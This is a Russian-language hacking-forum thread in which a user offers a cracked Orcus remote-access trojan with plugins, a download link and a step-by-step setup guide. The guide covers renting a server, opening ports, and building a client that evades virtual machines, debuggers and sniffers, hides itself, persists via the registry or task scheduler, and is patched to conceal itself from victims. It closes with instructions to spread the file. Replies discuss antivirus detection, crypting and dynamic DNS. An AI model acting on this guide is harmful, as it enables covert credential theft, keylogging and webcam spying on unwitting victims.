• В этом разделе невозможно создать тему привычным способом. Создать тему в этом разделе можно только через "Ресурсы".

Актуально Чистый Orcus rat 1.9.1 + 13 плагинов + инструкция

Rin1

Новорег

Rin1

Новорег
Регистрация
3 Фев 2018
Сообщения
26
Симпатии
10
Время онлайн
23м 54с
Сборник плагинов и чистого орка в одном архиве без дополнительной е**ли - моя работа
Инструкция - копипаст с говнохак

Начнем.

Коротко о функционале (нет)

Контроль
  • Полная информация о компьютере
  • Деинсталляция, убийство компьютера, повышение привилегий
Reverse Proxy
  • Можно использовать жертву как прокси
Информация
  • Все активные TCP/UDP соединения клиента
  • Вся информация о ПК юзера
  • Стиллер (Google Chrome, Mozilla Firefox, FileZilla, Internet Explorer, JDownloader, Opera, Thunderbird, WinSCP, Pidgin, ...)
  • Стиллер куки (Google Chrome, Mozilla Firefox, Yandex)
  • Информация о загруженности системы
Развлечения
  • Проигрывание аудио на ПК
  • Выбор звукового устройства
  • Скрыть/Показать таскбар/рабочий стол/часы
  • Поменять местами кнопки на мыши (по функционалу)
  • (Описывать все из этой категории не буду, слишком много)
Утилиты
  • Чат с клиентом
  • Исполнение произвольного C#/VB.NET/Batch кода
  • Отправление сообщений клиенту
  • Голосовой чат с клиентом
Система
  • Консоль
  • Менеджер устройств
  • Менеджер файлов
  • Менеджер программ
  • Менеджер регистра/автозагрузки
  • Менеджер процессов
  • Менеджер окон
  • я как будто на юрфак попал
Прочее
  • Кейлоггер
  • RDP
  • Вебкамера
  • Таски для юзеров и для групп юзеров
  • Статистика по юзерам
  • DDOS

А теперь, собственно, к настройке
Нам понадобится:

  • один дедик
  • один ратник
  • две руки
Дедик лично я брал на vdsina (не реклама), там не сильно с портами нужно заморачиваться

Далее по пунктам:

  1. Скачиваем ратник, распаковываем куда-нибудь и запускаем экзешник
  2. Выскочит окно с именем того кто крякнул, жмем окей, далее жмем сюда
    c224413127237fd829eac9506c78667e.png
  3. В айпи адресе вводим айпишник дедика, далее жмем Add, вводим пароль, жмем build и сохраняем на рабочий стол к примеру
    715ffe7c15b36ec6da9e356221bd9771.png
  4. Созданные 3 файла пакуем в архив и доставляем на дедик. Далее запускаем там экзешник, видим окно, жмем Add и выставляем там как на скрине (0.0.0.0)
    5b62a57dbf8f4a7a7746d4f9568b8e8b.png
  5. Далее на дедике открываем Firewall, либо же брандмауэр если он на русском. Жмем пкм как на скрине и открываем это дерьмо
    b6ea4555d66676fd6f92711eb6737b12.png
  6. Далее все как на скринах
    fed987d8c0387c667d344faf85942e5b.png
  7. 02836d0b9e188bc5ff0d3d588aa88f76.png
  8. a43fec7aaf6e91369e9e2a477b544d21.png
  9. a33bb9fe5bedf860964043b5ce6b0b3b.png
  10. 7d5eb18a6cb9a579ece865b3ce26eaf3.png
  11. Жмем Finish и открываем на своем компе оркус. Вводим айпишник дедика и пароль который указывали при создании сервера.
    cc4e4df218b20f518fb9c8cbc1af658e.png
  12. Авторизовались. Жмем Build в верхнем левом углу. Видим следующую картину:
    ebde1ea81981272187b5bfe796136320.png
    1. ID группы к которой присоединиться клиент (можно оставить пустым)
    2. Активация кейлоггера
    3. Нужно ли требовать права админа (при выборе не будет работать без них)
  13. В следующей вкладке уже все прописано. По желанию можно установить прокси через которые будет коннектиться клиент к дедику.
    4fae309dcdc4a4b9e582c1ae1349325c.png
  14. 2875dee05d0d25c3ff6cf764e6fa72c7.png
    1. Защита от запуска на виртуалке
    2. Защита от запуска под дебагером
    3. Защита от запуска под сниффером
  15. 514e4023b965bac50bd0ccfd78c344ad.png
    1. Установка клиента
    2. Скрытие файла
    3. Изменение даты создания файла
    4. Установить значок привелегий администратора
    5. Админ привелегии для установщика
    6. Выключить автозагрузку
    7. Автозагрузка с помощью реестра
    8. Автозагрузка с помощью планировщика заданий
  16. Тут можно изменить информацию о файле
    dfc15954baf0923338bb3c404b993f41.png
  17. Тут 3 плагина
    44b8ffa075218743fd0f122b715834c8.png
    1. При убийстве процесса ратника выскочит синий экран смерти
    2. Выключает лампочку на вебкамере при подключении к ней (вроде не работало)
    3. Не разбирался что это, но походу бесполезная штука
  18. И последний шаг. Выбираем Orcus Patcher (без выбора этого плагина ратник палится в трее с предложением убить процесс/самоудалиться с компа жертвы (+палит ip сервера к которому подключен), а нам это естественно не нужно), по желанию меняем расширение файла спуфером (второе) и размер файла (первое), меняем иконку и ставим версию фреймворка на минимум. Жмем build и сохраняем.
    ccc7a1565535b2a25c28a7541f695ef7.png
Получившийся файл распространяем и радуемся жизни. Юзеры будут появляться в основном меню ратника.
Ссылка на скачивание:
Clear Orcus 1.9.1 + 13 plugins.rar (32.71MB) - SendSpace.com

VT Нет и скорее всего не будет тк это rat (но если прям вот так кому-нибудь захочется, то можно и залить (только сами потом крипт ищите на него ибо в этом плане он довольно капризный)
 
Данный пользователь недостаточно провел времени на форуме! Работа с ним может быть не безопасна!
Для снятия данного предупреждения необходимо достичь группы "Пользователь" или ее приобрести. Группы "VIP" и "Продавец" не имеют данного предупреждения.
Чтобы приобрести группу — напишите администратору.
Последнее редактирование:

Rin1

Новорег

Rin1

Новорег
Регистрация
3 Фев 2018
Сообщения
26
Симпатии
10
Время онлайн
23м 54с
P.s. не смотря на то, что на первом скрине инструкции особо внимательные могут увидеть версию 1.3.1, то спешу сообщить,что разницы в настройке 1.9.1 и 1.3.1 НЕТ (Вот **лять прям совсем Нет, отличия только в функционале и фиксе багов( что логично) и версия в архиве 1.9.1 (т.е. самая последняя на данный момент (25.04.2018) .
 
Данный пользователь недостаточно провел времени на форуме! Работа с ним может быть не безопасна!
Для снятия данного предупреждения необходимо достичь группы "Пользователь" или ее приобрести. Группы "VIP" и "Продавец" не имеют данного предупреждения.
Чтобы приобрести группу — напишите администратору.

mot0rrr

Новорег

mot0rrr

Новорег
Регистрация
11 Май 2017
Сообщения
26
Симпатии
15
Время онлайн
8ч 29м 43с
Что значит "чистый"? Ты иммешь ввиду что билд не будут палить антивирусы? И что не нужно криптовать?
 
Данный пользователь недостаточно провел времени на форуме! Работа с ним может быть не безопасна!
Для снятия данного предупреждения необходимо достичь группы "Пользователь" или ее приобрести. Группы "VIP" и "Продавец" не имеют данного предупреждения.
Чтобы приобрести группу — напишите администратору.

Rin1

Новорег

Rin1

Новорег
Регистрация
3 Фев 2018
Сообщения
26
Симпатии
10
Время онлайн
23м 54с
Что значит "чистый"? Ты иммешь ввиду что билд не будут палить антивирусы? И что не нужно криптовать?
Что он ни с чем не склеен и нет нужды искать чистый на просторах сети или расклеивать загаженный + отдельно плагины находились 50/50 рабочие, а тут 13 100% рабочих плагинов.
 
Данный пользователь недостаточно провел времени на форуме! Работа с ним может быть не безопасна!
Для снятия данного предупреждения необходимо достичь группы "Пользователь" или ее приобрести. Группы "VIP" и "Продавец" не имеют данного предупреждения.
Чтобы приобрести группу — напишите администратору.
Последнее редактирование:

Rin1

Новорег

Rin1

Новорег
Регистрация
3 Фев 2018
Сообщения
26
Симпатии
10
Время онлайн
23м 54с
UPD (30.04.18): Плагин игровой статистики крашит ратник. Раньше работал, теперь показывает нулевой вес и все. Не юзайте его. (в общем бывает и такое. 12 из 13 рабочие)
 
Данный пользователь недостаточно провел времени на форуме! Работа с ним может быть не безопасна!
Для снятия данного предупреждения необходимо достичь группы "Пользователь" или ее приобрести. Группы "VIP" и "Продавец" не имеют данного предупреждения.
Чтобы приобрести группу — напишите администратору.
Последнее редактирование:

d3dx6de

Новорег

d3dx6de

Новорег
Регистрация
12 Май 2018
Сообщения
3
Симпатии
0
Время онлайн
0
How to open port in my PERSONAL COMPUTEER?
 
Данный пользователь недостаточно провел времени на форуме! Работа с ним может быть не безопасна!
Для снятия данного предупреждения необходимо достичь группы "Пользователь" или ее приобрести. Группы "VIP" и "Продавец" не имеют данного предупреждения.
Чтобы приобрести группу — напишите администратору.

THESHINING

Новорег

THESHINING

Новорег
Регистрация
5 Дек 2017
Сообщения
2
Симпатии
0
Время онлайн
10м 52с
Данный пользователь недостаточно провел времени на форуме! Работа с ним может быть не безопасна!
Для снятия данного предупреждения необходимо достичь группы "Пользователь" или ее приобрести. Группы "VIP" и "Продавец" не имеют данного предупреждения.
Чтобы приобрести группу — напишите администратору.

Iogun

Новорег

Iogun

Новорег
Регистрация
28 Май 2018
Сообщения
9
Симпатии
0
Время онлайн
0
Эх дедика нет жаль можно про экспериментировать .... Как то мне попадался подобный и действительно после его убийства в процессах , синий экран смерти ( после перезапуска все наладилось система ОЖИЛА ! RAT сдох
 
Данный пользователь недостаточно провел времени на форуме! Работа с ним может быть не безопасна!
Для снятия данного предупреждения необходимо достичь группы "Пользователь" или ее приобрести. Группы "VIP" и "Продавец" не имеют данного предупреждения.
Чтобы приобрести группу — напишите администратору.

Rin1

Новорег

Rin1

Новорег
Регистрация
3 Фев 2018
Сообщения
26
Симпатии
10
Время онлайн
23м 54с
d3dx6de, Для этого ратника Не нужно открывать порты на Своем компе, а нужно открывать порты на Дедике!
--- Post updated ---
Iogun, С этим ратником таких проблем нет. Дедик можно арендовать рублей за 350 в месяц.
 
Данный пользователь недостаточно провел времени на форуме! Работа с ним может быть не безопасна!
Для снятия данного предупреждения необходимо достичь группы "Пользователь" или ее приобрести. Группы "VIP" и "Продавец" не имеют данного предупреждения.
Чтобы приобрести группу — напишите администратору.

GayFox

Новорег

GayFox

Новорег
Регистрация
22 Янв 2017
Сообщения
3
Симпатии
0
Время онлайн
14м 44с
тс просто объяснил божественно +rep
 
Данный пользователь недостаточно провел времени на форуме! Работа с ним может быть не безопасна!
Для снятия данного предупреждения необходимо достичь группы "Пользователь" или ее приобрести. Группы "VIP" и "Продавец" не имеют данного предупреждения.
Чтобы приобрести группу — напишите администратору.

grilder

Новорег

grilder

Новорег
Регистрация
6 Авг 2016
Сообщения
14
Симпатии
0
Время онлайн
1ч 5м 24с
DUC можно зацепить?
 
Данный пользователь недостаточно провел времени на форуме! Работа с ним может быть не безопасна!
Для снятия данного предупреждения необходимо достичь группы "Пользователь" или ее приобрести. Группы "VIP" и "Продавец" не имеют данного предупреждения.
Чтобы приобрести группу — напишите администратору.

mikro

Новорег

mikro

Новорег
Регистрация
17 Янв 2018
Сообщения
13
Симпатии
6
Время онлайн
56м 0с
какой детект файла ?
 
Данный пользователь недостаточно провел времени на форуме! Работа с ним может быть не безопасна!
Для снятия данного предупреждения необходимо достичь группы "Пользователь" или ее приобрести. Группы "VIP" и "Продавец" не имеют данного предупреждения.
Чтобы приобрести группу — напишите администратору.

gunz

Новорег

gunz

Новорег
Регистрация
25 Июн 2016
Сообщения
6
Симпатии
8
Время онлайн
0
было бы очень хорошо, если бы кто "с репой" или модеры проверили на склейку.
 

grilder

Новорег

grilder

Новорег
Регистрация
6 Авг 2016
Сообщения
14
Симпатии
0
Время онлайн
1ч 5м 24с
хоть мне никто так и не ответил, но всё таки DUC (NO-IP) привязал !!!
 
Данный пользователь недостаточно провел времени на форуме! Работа с ним может быть не безопасна!
Для снятия данного предупреждения необходимо достичь группы "Пользователь" или ее приобрести. Группы "VIP" и "Продавец" не имеют данного предупреждения.
Чтобы приобрести группу — напишите администратору.

gargon

Новорег

gargon

Новорег
Регистрация
3 Авг 2018
Сообщения
1
Симпатии
0
Время онлайн
0
а тут hvnc не реализован?как на этом видео?
 
Данный пользователь недостаточно провел времени на форуме! Работа с ним может быть не безопасна!
Для снятия данного предупреждения необходимо достичь группы "Пользователь" или ее приобрести. Группы "VIP" и "Продавец" не имеют данного предупреждения.
Чтобы приобрести группу — напишите администратору.

glebkhil

Новорег

glebkhil

Новорег
Регистрация
12 Фев 2017
Сообщения
5
Симпатии
0
Время онлайн
1м 27с
Данный пользователь недостаточно провел времени на форуме! Работа с ним может быть не безопасна!
Для снятия данного предупреждения необходимо достичь группы "Пользователь" или ее приобрести. Группы "VIP" и "Продавец" не имеют данного предупреждения.
Чтобы приобрести группу — напишите администратору.

Dendos

Пользователь

Dendos

Пользователь
Регистрация
15 Ноя 2017
Сообщения
128
Симпатии
95
Время онлайн
3дн 21ч 50м 26с
RAT топовый и на склейку - проверенно
У кого проблема с портами - подключите статический IP, либо пользуйтесь hidemy VPN
Из минусов:
- долго подключаются юзеры
 

dver

Новорег

dver

Новорег
Регистрация
26 Ноя 2017
Сообщения
11
Симпатии
0
Время онлайн
7ч 43м 45с
А если я его к no-ip привяжу, будет работать? Может кто-нибудь уже так делал?
 
Данный пользователь недостаточно провел времени на форуме! Работа с ним может быть не безопасна!
Для снятия данного предупреждения необходимо достичь группы "Пользователь" или ее приобрести. Группы "VIP" и "Продавец" не имеют данного предупреждения.
Чтобы приобрести группу — напишите администратору.

Dendos

Пользователь

Dendos

Пользователь
Регистрация
15 Ноя 2017
Сообщения
128
Симпатии
95
Время онлайн
3дн 21ч 50м 26с
А если я его к no-ip привяжу, будет работать? Может кто-нибудь уже так делал?
проверял уже, через no-ip уже бредовая тема и в 2018 году не работает. Через hidemy name vpn порты открываешь, либо покупаешь статический ip у провайдера
 
Сверху